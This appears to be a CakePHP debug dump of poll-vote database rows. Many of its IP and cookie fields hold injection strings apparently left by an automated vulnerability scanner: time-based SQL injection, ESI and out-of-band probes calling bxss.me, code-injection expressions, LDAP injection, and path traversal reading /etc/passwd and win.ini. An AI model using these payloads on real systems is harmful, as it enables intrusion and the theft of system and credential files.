'id' => '7342',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6800 => array(
'id' => '7343',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6801 => array(
'id' => '7344',
'ip' => '85.190.233.47',
'ip1' => '-1 OR 2+303-303-1=0+0+0+1 -- ',
'sondage_id' => '2'
),
(int) 6802 => array(
'id' => '7345',
'ip' => '85.190.233.47',
'ip1' => '-1 OR 2+899-899-1=0+0+0+1',
'sondage_id' => '2'
),
(int) 6803 => array(
'id' => '7346',
'ip' => '85.190.233.47',
'ip1' => '-1' OR 2+327-327-1=0+0+0+1 -- ',
'sondage_id' => '2'
),
(int) 6804 => array(
'id' => '7347',
'ip' => '85.190.233.47',
'ip1' => '-1' OR 2+250-250-1=0+0+0+1 or 'k3VnaCsv'='',
'sondage_id' => '2'
),
(int) 6805 => array(
'id' => '7348',
'ip' => '85.190.233.47',
'ip1' => '-1" OR 2+521-521-1=0+0+0+1 -- ',
'sondage_id' => '2'
),
(int) 6806 => array(
'id' => '7349',
'ip' => '85.190.233.47',
'ip1' => 'if(now()=sysdate(),sleep(15),0)',
'sondage_id' => '2'
),
(int) 6807 => array(
'id' => '7350',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe20'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z',
'sondage_id' => '2'
),
(int) 6808 => array(
'id' => '7351',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe20"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z',
'sondage_id' => '2'
),
(int) 6809 => array(
'id' => '7352',
'ip' => '85.190.233.47',
'ip1' => '(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/',
'sondage_id' => '2'
),
(int) 6810 => array(
'id' => '7353',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2-1 waitfor delay '0:0:15' -- ',
'sondage_id' => '2'
),
(int) 6811 => array(
'id' => '7354',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2rbFXzuNr'; waitfor delay '0:0:15' -- ',
'sondage_id' => '2'
),
(int) 6812 => array(
'id' => '7355',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2jXgxWzUW' OR 875=(SELECT 875 FROM PG_SLEEP(15))--',
'sondage_id' => '2'
),
(int) 6813 => array(
'id' => '7356',
'ip' => 'https:\\bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6814 => array(
'id' => '7357',
'ip' => 'https:\\bxss.me/',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6815 => array(
'id' => '7358',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2MCahWugk') OR 310=(SELECT 310 FROM PG_SLEEP(15))--',
'sondage_id' => '2'
),
(int) 6816 => array(
'id' => '7359',
'ip' => 'https:\\bxss.me/\',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6817 => array(
'id' => '7360',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2WI6oLofh')) OR 394=(SELECT 394 FROM PG_SLEEP(15))--',
'sondage_id' => '2'
),
(int) 6818 => array(
'id' => '7361',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'',
'sondage_id' => '2'
),
(int) 6819 => array(
'id' => '7362',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6820 => array(
'id' => '7363',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6821 => array(
'id' => '7364',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2'"',
'sondage_id' => '2'
),
(int) 6822 => array(
'id' => '7365',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6823 => array(
'id' => '7366',
'ip' => '85.190.233.47',
'ip1' => '@@oXNBZ',
'sondage_id' => '2'
),
(int) 6824 => array(
'id' => '7367',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6825 => array(
'id' => '7368',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6826 => array(
'id' => '7369',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6827 => array(
'id' => '7370',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6828 => array(
'id' => '7371',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6829 => array(
'id' => '7372',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6830 => array(
'id' => '7373',
'ip' => '/\bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6831 => array(
'id' => '7374',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6832 => array(
'id' => '7375',
'ip' => '/\scimat.dz.bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6833 => array(
'id' => '7376',
'ip' => '/\scimat.dz@bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6834 => array(
'id' => '7377',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6835 => array(
'id' => '7378',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6836 => array(
'id' => '7379',
'ip' => '/\bxss.me\@scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6837 => array(
'id' => '7380',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6838 => array(
'id' => '7381',
'ip' => '/\bxss.me#scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6839 => array(
'id' => '7382',
'ip' => '/\bxss.me?scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6840 => array(
'id' => '7383',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6841 => array(
'id' => '7384',
'ip' => '/\/bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6842 => array(
'id' => '7385',
'ip' => '/\/scimat.dz.bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6843 => array(
'id' => '7386',
'ip' => '/\/scimat.dz@bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6844 => array(
'id' => '7387',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6845 => array(
'id' => '7388',
'ip' => '/\/bxss.me#scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6846 => array(
'id' => '7389',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6847 => array(
'id' => '7390',
'ip' => '/\/bxss.me?scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6848 => array(
'id' => '7391',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6849 => array(
'id' => '7392',
'ip' => '\\bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6850 => array(
'id' => '7393',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6851 => array(
'id' => '7394',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6852 => array(
'id' => '7395',
'ip' => '\\scimat.dz.bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6853 => array(
'id' => '7396',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6854 => array(
'id' => '7397',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6855 => array(
'id' => '7398',
'ip' => '\\scimat.dz@bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6856 => array(
'id' => '7399',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6857 => array(
'id' => '7400',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6858 => array(
'id' => '7401',
'ip' => '\\bxss.me\@scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6859 => array(
'id' => '7402',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6860 => array(
'id' => '7403',
'ip' => '\\bxss.me#scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6861 => array(
'id' => '7404',
'ip' => '\\bxss.me?scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6862 => array(
'id' => '7405',
'ip' => '85.190.233.47',
'ip1' => 'https://scimat.dz/',
'sondage_id' => '2'
),
(int) 6863 => array(
'id' => '7406',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6864 => array(
'id' => '7407',
'ip' => '85.190.233.47',
'ip1' => 'https://redirtest.acx/',
'sondage_id' => '2'
),
(int) 6865 => array(
'id' => '7408',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6866 => array(
'id' => '7409',
'ip' => '85.190.233.47',
'ip1' => 'scimat.dz',
'sondage_id' => '2'
),
(int) 6867 => array(
'id' => '7410',
'ip' => '85.190.233.47',
'ip1' => 'redirtest.acx',
'sondage_id' => '2'
),
(int) 6868 => array(
'id' => '7411',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6869 => array(
'id' => '7412',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6870 => array(
'id' => '7413',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6871 => array(
'id' => '7414',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6872 => array(
'id' => '7415',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6873 => array(
'id' => '7416',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6874 => array(
'id' => '7417',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6875 => array(
'id' => '7418',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6876 => array(
'id' => '7419',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6877 => array(
'id' => '7420',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6878 => array(
'id' => '7421',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6879 => array(
'id' => '7422',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6880 => array(
'id' => '7423',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6881 => array(
'id' => '7424',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6882 => array(
'id' => '7425',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6883 => array(
'id' => '7426',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6884 => array(
'id' => '7427',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6885 => array(
'id' => '7428',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6886 => array(
'id' => '7429',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6887 => array(
'id' => '7430',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6888 => array(
'id' => '7431',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6889 => array(
'id' => '7432',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6890 => array(
'id' => '7433',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6891 => array(
'id' => '7434',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6892 => array(
'id' => '7435',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6893 => array(
'id' => '7436',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6894 => array(
'id' => '7437',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6895 => array(
'id' => '7438',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6896 => array(
'id' => '7439',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6897 => array(
'id' => '7440',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6898 => array(
'id' => '7441',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6899 => array(
'id' => '7442',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6900 => array(
'id' => '7443',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6901 => array(
'id' => '7444',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6902 => array(
'id' => '7445',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6903 => array(
'id' => '7446',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6904 => array(
'id' => '7447',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6905 => array(
'id' => '7448',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6906 => array(
'id' => '7449',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6907 => array(
'id' => '7450',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6908 => array(
'id' => '7451',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6909 => array(
'id' => '7452',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6910 => array(
'id' => '7453',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6911 => array(
'id' => '7454',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6912 => array(
'id' => '7455',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6913 => array(
'id' => '7456',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6914 => array(
'id' => '7457',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6915 => array(
'id' => '7458',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6916 => array(
'id' => '7459',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6917 => array(
'id' => '7460',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6918 => array(
'id' => '7461',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6919 => array(
'id' => '7462',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6920 => array(
'id' => '7463',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6921 => array(
'id' => '7464',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6922 => array(
'id' => '7465',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6923 => array(
'id' => '7466',
'ip' => 'WmECXeyM',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6924 => array(
'id' => '7467',
'ip' => '3zhGL8OS: AQFipohD',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6925 => array(
'id' => '7468',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6926 => array(
'id' => '7469',
'ip' => '85.190.233.47',
'ip1' => 'lct5OQFW',
'sondage_id' => '2'
),
(int) 6927 => array(
'id' => '7470',
'ip' => '85.190.233.47',
'ip1' => 'OQZRVRZ8: Mwwme8Xk',
'sondage_id' => '2'
),
(int) 6928 => array(
'id' => '7471',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6929 => array(
'id' => '7472',
'ip' => '${10000245+9999878}',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6930 => array(
'id' => '7473',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2<esi:include src="http://bxss.me/rpb.png"/>',
'sondage_id' => '2'
),
(int) 6931 => array(
'id' => '7474',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6932 => array(
'id' => '7475',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6933 => array(
'id' => '7476',
'ip' => '85.190.233.47',
'ip1' => '${9999672+9999518}',
'sondage_id' => '2'
),
(int) 6934 => array(
'id' => '7477',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6935 => array(
'id' => '7478',
'ip' => '85.190.233.47',
'ip1' => 'ZXdNd2VtZGJhQk5BSmNIUFZkNmhDWTN0U1I1VWlNYTZCZ3VxYjU0NA==',
'sondage_id' => '2'
),
(int) 6936 => array(
'id' => '7479',
'ip' => '85.190.233.47',
'ip1' => 'response.write(9561037*9979801)',
'sondage_id' => '2'
),
(int) 6937 => array(
'id' => '7480',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6938 => array(
'id' => '7481',
'ip' => '85.190.233.47',
'ip1' => ''+response.write(9561037*9979801)+'',
'sondage_id' => '2'
),
(int) 6939 => array(
'id' => '7482',
'ip' => '85.190.233.47',
'ip1' => '"+response.write(9561037*9979801)+"',
'sondage_id' => '2'
),
(int) 6940 => array(
'id' => '7483',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6941 => array(
'id' => '7484',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2&n983830=v985999',
'sondage_id' => '2'
),
(int) 6942 => array(
'id' => '7485',
'ip' => '85.190.233.47',
'ip1' => '',
'sondage_id' => '2'
),
(int) 6943 => array(
'id' => '7486',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6944 => array(
'id' => '7487',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6945 => array(
'id' => '7488',
'ip' => 'file:///etc/passwd',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6946 => array(
'id' => '7489',
'ip' => ')',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6947 => array(
'id' => '7490',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6948 => array(
'id' => '7491',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6949 => array(
'id' => '7492',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6950 => array(
'id' => '7493',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6951 => array(
'id' => '7494',
'ip' => '!(()&&!|*|*|',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6952 => array(
'id' => '7495',
'ip' => '../85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6953 => array(
'id' => '7496',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6954 => array(
'id' => '7497',
'ip' => '^(#$!@#$)(()))******',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6955 => array(
'id' => '7498',
'ip' => 'https://scimat.dz/',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6956 => array(
'id' => '7499',
'ip' => '85.190.233.47',
'ip1' => '../../../../../../../../../../../../../../etc/passwd',
'sondage_id' => '2'
),
(int) 6957 => array(
'id' => '7500',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6958 => array(
'id' => '7501',
'ip' => '85.190.233.47',
'ip1' => ')',
'sondage_id' => '2'
),
(int) 6959 => array(
'id' => '7502',
'ip' => '85.190.233.47',
'ip1' => '../../../../../../../../../../../../../../windows/win.ini',
'sondage_id' => '2'
),
(int) 6960 => array(
'id' => '7503',
'ip' => '85.190.233.47',
'ip1' => 'file:///etc/passwd',
'sondage_id' => '2'
),
(int) 6961 => array(
'id' => '7504',
'ip' => '85.190.233.47',
'ip1' => '!(()&&!|*|*|',
'sondage_id' => '2'
),
(int) 6962 => array(
'id' => '7505',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6963 => array(
'id' => '7506',
'ip' => 'https://scimat.dz/',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6964 => array(
'id' => '7507',
'ip' => '85.190.233.47',
'ip1' => '^(#$!@#$)(()))******',
'sondage_id' => '2'
),
(int) 6965 => array(
'id' => '7508',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6966 => array(
'id' => '7509',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6967 => array(
'id' => '7510',
'ip' => '85.190.233.47',
'ip1' => '../CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
